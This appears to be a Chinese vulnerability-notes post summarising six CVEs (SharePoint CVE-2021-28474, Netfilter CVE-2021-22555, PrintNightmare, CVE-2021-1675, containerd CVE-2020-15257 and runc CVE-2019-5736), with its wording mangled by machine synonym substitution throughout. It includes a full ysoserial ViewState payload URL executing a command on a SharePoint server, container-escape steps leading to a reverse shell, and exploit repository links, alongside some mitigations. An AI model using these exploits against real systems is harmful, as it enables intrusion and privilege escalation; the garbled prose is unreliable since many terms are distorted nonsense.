所学漏洞总结

我造你我宣你

1、CVE-2021-28474 MS SharePoint长途代码施行破绽

1、破绽简介

破绽许可经由过程身份考证的用户正在SharePoint web使用法式的效劳账户中施行随便.NET代码。念要操纵该破绽，进犯者需求具有SharePoint站面的SPBasePermissions.ManageLists权限。默许状况下，颠末身份考证的SharePoint用户能够创立网页页里，并具有所需的一切权限。
2、破绽成果

用于宁静考证的代码战实践处置用户输进的代码之间纷歧致。
EditingPageParser.VerifyControlOnSafeList()供给考证，考证输进能否包含没有宁静控件，也便是考证web.config文件中SafeControl已将任何控件标识表记标帜为宁静。
EditingPageParser.ParseStringInternal()分析用户输进，存放器中疑息添补hashtable，效劳器控件标识表记标帜中的值添补hashtable2。按照web.config中的SafeControl考证hashtable2，假如有无被标识表记标帜为宁静的控件，便会扔出非常。
SharePoint只考证效劳器端控件带有runat=“server”属性的标识表记标帜
考证经由过程SharePoint处置标识表记标帜。
处置时，text4 = HttpUtility.HtmlDecode(text4)属性值有分析器停止HTML解码，但验证时出有响应止。
参与我们runat=“&#115；server”，EditingPageParser.VerifyControlOnSafeList()函数没有会将其视为效劳器端控件，也没有会检查它的宁静性。可是，正在处置时，它将被辨认为效劳器端控件并施行。
3、破绽影响范畴

Microsoft SharePoint Foundation 2013 Service Pack 1
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2016
4、破绽操纵

一般用户创立站面
指背该站面任何站面页里的相对途径
利用自界说可施行文件背易受进犯的效劳器收收恳求以触收破绽。需求供给网站地点、凭据战相对途径。
进犯成功会支到web.config的内乱容，正在web.config中获得validationKey战validationAlg="HMACSHA256"
进进进犯目的的SharePoint，翻开C：windows emp文件夹，此时文件夹没有存正在我们上传的文件。
正在进犯者主机上翻开success.aspx页里，源代码视图找到__VIEWSTATEGENERATOR
用ysoserial天生ViewState的paylolad，将其做为__VIEWSTATE参数收收到目的效劳器

http://sp2019/sites/ts01/_layouts/15/success.aspx?__VIEWSTATE=%2FwEy2gcAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAABlN5c3RlbQUBAAAAQFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0EAAAABUNvdW50CENvbXBhcmVyB1ZlcnNpb24FSXRlbXMAAQABCAgCAAAAAgAAAAkDAAAAAAAAAAkEAAAABAMAAABAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmddXQEAAAALX2NvbXBhcmlzb24BCQUAAAARBAAAAAIAAAAGBgAAACsvYyBlY2hvIFJDRSA%2BIGM6L3dpbmRvd3MvdGVtcC9TUF9SQ0VfMDEudHh0BgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUAAXgBAQEJCAAAAA0ADQAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkAEnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQEBAQEBBgsAAACSAVN5c3RlbS5GdW5jYDNbW1N5c3RlbS5TdHJpbmddLFtTeXN0ZW0uU3RyaW5nXSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsU3lzdGVtLFZlcnNpb249NC4wLjAuMCxDdWx0dXJlPW5ldXRyYWwsUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAAAIbXNjb3JsaWINAAYNAAAARlN5c3RlbSxWZXJzaW9uPTQuMC4wLjAsQ3VsdHVyZT1uZXV0cmFsLFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYPAAAABVN0YXJ0CRAAAAAECQAAAAF4BwAAAAAAAAAAAAABAQEBAQABCA0ADQANAA0ADQAAAAAAAQoAAAAJAAAABhYAAAAHQ29tcGFyZQ0ABhgAAAANU3lzdGVtLlN0cmluZw0ADQAAAAAADQABEAAAAAgAAAAGGwAAACRTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nXV0JDAAAAA0ACQwAAAAJGAAAAAkWAAAAC5nTmz9vXHLF1C5DkWIPhsB4pP5YHhCaIK%2Bh79Fa4ZeW
复造代码

再检查效劳器C盘emp文件，便发明文件创立成功。

2、CVE-2021-22555 Linux Netfilter权限提拔破绽

1、破绽简介

因为Linux Netfilter模块中memcpy()、memset()函数正在利用过程当中存正在缺点，经由过程堆越界写进，招致进犯者能够操纵破绽完成权限提拔，假如正在容器场景下，能够从docker、k8s容器中施行容器遁劳（今朝poc已公然）。
Linux Netfilter是一个对数据包过滤、收集地点转换(NAT)战基于和谈范例毗邻的办理框架。
2、破绽阐发

我们的破绽正在xt_compat_target_from_user()中，此中memset()被利用偏偏移量target->targetsize挪用，该偏偏移量正在分派过程当中出有被思索出来，从而招致一些字节的越界写进。

memset(t->data + target->targetsize, 0, pad);

复造代码

targetsize没有受用户的掌握，但能够经由过程称号挑选不同构造大小的目的（如TCPMSS、TTL或NFQUEUE）。targetsize越年夜，正在偏偏移量上可变革的处所便越多。目的的大小必需没有是8字节对齐的，如许才华合意pad > 0的前提。大要性最年夜的构造是NFLOG，经由过程该构造我们能够指定一个越界大小多达0x4c个字节的偏偏移量。
3、破绽范畴

Linux Kernel版本 >=2.6.19
4、破绽操纵

poc：
https://github.com/谷歌/security-research/tree/master/pocs/linux/cve-2021-22555
5、破绽处理

非容器场景：

晋级至宁静版本
禁用非特权用户施行CLONE_NEWUSER、CLONE_NEWNET去停止减缓：echo 0 > /proc/sys/user/max_user_namespaces

容器场景：

晋级宁静内乱核版本
施行echo 0 > /proc/sys/user/max_user_namespaces 停止减缓
开启容器seccomp功用，躲避容器遁劳风险（评价对营业的影响）

3、CVE-2021-34527 Windows PrintNightmare 破绽

1、破绽简介

windows挨印效劳中的破绽，进犯者能够操纵该破绽利用低权限用户减载歹意DLL，完成长途代码施行。挪用的RPC函数为RpcAsyncAddPrinterDriver，体系处置那个RPC函数后，再挪用了YAddPrinterDriverEx函数，可是出有对dwFileCopyFlags停止前提判定，因而能够设置APD_INSTALL_)WRANED_DRIVER标记，使增加挨印机驱动时，能够以下权限减载DLL。

2、破绽阐发

CVE-2021-34527是对CVE-2021-1675破绽补钉的绕过。
利用了RpcAsyncAddPrinterDriver的挨印机API对补钉权限停止绕过。那个API能够增长APD_INSTALL_WARNED_DRIVER，但出有校验历程，隐公能够绕过bitiest检查，完成歹意DLL减载战代码施行。
3、破绽操纵

4、破绽范畴

Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
等...
5、宁静倡议

微硬民圆补钉
阿里云补钉
先利用Doamin Admin身份检测Print Spooler效劳能否运转
1. Get-Service -Name Spooler
复造代码
假如已被制止，一可使用以下去截至Print Spooler效劳
1. Stop-Service -Name Spooler -Force
复造代码
两也能够利用以下去设置流量战略，制止流量进进
1. Set-Service -Name Spooler -StartupType Disabled
复造代码

4、CVE-2021-1675 Windows Print Spooler长途代码施行破绽

1、破绽简介

正在CVE-2021-1675的EXP中，挪用的RPC函数为RpcAddPrinterDriverEx。体系处置那个RPC函数后，再挪用了YAddPrinterDriverEx函数，可是出有对dwFileCopyFlags停止前提判定，因而能够设置APD_INSTALL_)WRANED_DRIVER标记，使增加挨印机驱动时，能够以下权限减载DLL。

2、破绽阐发

挪用YAddPrinterDriverEx函数时，出有对参数dwFileCopyFlag做校验，使APD_INSTALL_WARNED_DRIVER标记，使得前面临驱动的正当校验失利，使其能够随便减载DLL，而且为system权限。
3、破绽操纵

4、破绽范畴

Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
等...
5、宁静倡议

1、实时更新Window补钉
2、正在效劳使用（services.msc）中禁用 Print Spooler效劳。
5、CVE-2020-15257 Containerd掌握docker遁劳破绽

1、破绽简介

containerd是容器运转时，能够做为linux战window的保护法式利用。
正在-net=host（同享主机收集，没有需求再做端心映照）参数启动时，取宿主机同享net namespace。容器中的进犯者能够绕过权限会见containerd掌握的API招致权限提拔
2、破绽阐发

3、破绽操纵

root用户以同享主机收集的方法启动容器sudo docker run -itd –network=host ubuntu:latest /bin/bash
容器内乱施行cat /proc/net/unix|grep -a "containerd-shim" 可看到笼统定名空间Unix域套接字.
再经由过程CDK施行exp便可反弹shell，完成遁劳

https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gz

复造代码

4、破绽范畴

containerd < 1.4.3
containerd < 1.3.9
5、CVE-2019-5736 RUNC长途代码施行破绽

1、破绽简介

RunC是正在初级别容器运转时，用于消费战运转容器的东西。乌客利用受掌握的镜像创立新容器，或进进具有写进权限的现有容器（docker exec）时可触收该破绽。该破绽许可歹意硬件经由过程起码的用户交互笼盖主机操纵体系上的RunC两进造文件，并以root权限施行随便代码，RunC、Apache Mesoso战LXC等开源容器办理体系均受其影响。
2、破绽阐发

正在Docker 18.09.2之前的版本中利用了的runc版本小于1.0-rc6，因而许可进犯者重写宿主机上的runc 两进造文件，进犯者能够正在宿主机上以root身份施行号令。
3、破绽操纵

下载CVE-2019-5736编译go剧本天生进犯payload。（https://github.com/Frichetten/CVE-2019-5736-PoC）,将go剧本中的号令修正为反弹shell
4、破绽范畴

docker version